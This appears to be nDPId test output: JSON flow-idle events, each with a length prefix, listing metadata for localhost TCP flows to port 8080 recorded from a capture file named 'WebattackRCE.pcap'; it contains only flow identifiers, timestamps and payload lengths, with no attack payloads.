-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7440000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277977,"flow_last_seen":1576420277977,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277980,"flow_last_seen":1576420277980,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7440000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7440000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7440000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7440000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 